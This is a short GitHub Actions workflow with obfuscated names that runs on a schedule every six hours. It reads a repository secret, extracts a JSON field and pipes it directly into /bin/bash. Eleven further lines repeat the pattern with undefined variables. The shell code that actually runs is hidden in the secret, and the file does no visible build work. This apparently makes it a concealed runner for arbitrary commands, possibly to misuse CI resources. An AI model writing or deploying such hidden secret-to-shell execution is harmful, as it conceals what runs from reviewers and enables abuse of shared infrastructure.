name: sichuoch
on:
  workflow_dispatch:
  schedule:
    - cron: '52 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: sichuoch
        env:
          gq36281: ${{ secrets.gq36281 }}
        run: |
          echo $gq36281 | jq -r .zorhp33 | /bin/bash
          echo $nd233 | jq -r .gktr44 | /bin/bash
          echo $mtfp66042 | jq -r .s3 | /bin/bash
          echo $oi73 | jq -r .wfrxn204 | /bin/bash
          echo $qt9695 | jq -r .wel5951 | /bin/bash
          echo $mifsy007 | jq -r .xdx270 | /bin/bash
          echo $o04706 | jq -r .z4872 | /bin/bash
          echo $dbrm9 | jq -r .ij41 | /bin/bash
          echo $uduq7289 | jq -r .zsd90299 | /bin/bash
          echo $nke55 | jq -r .wy22 | /bin/bash
          echo $xn0 | jq -r .ck3 | /bin/bash
          echo $hkd30949 | jq -r .omlld43 | /bin/bash

